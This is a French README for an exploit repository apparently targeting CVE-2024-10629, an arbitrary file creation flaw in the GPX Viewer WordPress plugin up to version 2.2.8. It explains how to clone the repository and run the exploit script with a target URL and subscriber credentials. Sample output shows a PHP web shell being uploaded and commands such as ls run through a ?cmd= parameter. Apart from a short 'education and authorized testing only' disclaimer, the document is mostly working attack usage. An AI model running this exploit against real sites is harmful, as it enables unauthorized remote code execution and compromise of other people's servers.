
GPX Viewer <= 2.2.8 - Authentifié (Subscriber+) Création arbitraire de fichiers
Ce dépôt contient une preuve de concept d'exploitation pour le plugin GPX Viewer pour WordPress, qui est vulnérable à la création arbitraire de fichiers (CVE-2024-10629). La vulnérabilité permet aux attaquants authentifiés disposant d'un accès de niveau abonné et supérieur de créer des fichiers arbitraires sur le serveur du site affecté, ce qui peut potentiellement conduire à une exécution de code à distance.
Le plugin GPX Viewer pour WordPress est vulnérable à la création arbitraire de fichiers en raison d'un manque de vérification des capacités et de validation du type de fichier dans la fonction gpxv_file_upload() dans toutes les versions jusqu'à la version 2.2.8 incluse. Cela permet aux attaquants authentifiés, ayant un accès de niveau abonné et supérieur, de créer des fichiers arbitraires sur le serveur du site affecté, ce qui peut rendre possible une exécution de code à distance.
requestsClonez le dépôt :
git clone https://github.com/Nxploited/CVE-2024-10629/
cd CVE-2024-10629
Installez la bibliothèque requise :
pip install requests
Exécutez l'exploit :
python exploit.py -u <url_cible> -un <nom_utilisateur> -p <mot_de_passe>
Remplacez <url_cible>, <nom_utilisateur> et <mot_de_passe> par les valeurs appropriées.
python CVE-2024-10629.py -u http://example.com/wordpress -un abonne -p mot_de_passe_abonne
ls).[+] Version du plugin WordPress : 2.2.8
[+] Version vulnérable détectée. Poursuite de l'exploitation...
[+] Connexion réussie.
[+] Shell téléversé. Vérification du shell...
[+] Shell téléversé avec succès.
[+] URL du shell : http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Sortie de la commande :
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...
ls = Afficher les fichiersuname -a = Afficher les informations systèmeCet exploit est destiné à des fins éducatives et à des tests autorisés uniquement. L'utilisation non autorisée de cet exploit contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale et contraire à l'éthique. Les auteurs et contributeurs de ce dépôt ne sont pas responsables d'une quelconque utilisation abusive ou des dommages causés par cet exploit.
Par : Khaled Alenazi (Nxploit)